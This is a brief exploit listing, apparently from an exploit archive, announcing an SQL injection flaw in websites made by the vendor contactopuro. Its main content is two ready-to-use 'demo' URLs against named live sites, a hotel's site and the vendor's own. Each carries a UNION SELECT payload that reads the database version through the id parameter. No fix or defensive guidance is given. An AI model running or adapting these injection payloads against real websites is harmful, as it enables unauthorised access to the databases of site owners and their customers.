*********************************************************
#Exploit Title: contactopuro - SQL Injection vulnerability
#Date: 2020-11-02
#Exploit Author: Behrouz Mansoori
#Vendor Homepage : http://www.contactopuro.com
#Category:webapps
#Tested On: windows 10, Firefox
Demo :
https://www.columbiapalacehotel.com.ar/en/hotel.php?id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,version(),21,22,23,24,25,26,27--
http://www.contactopuro.com/trabajo.php?id=-62%20UNION%20SELECT%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************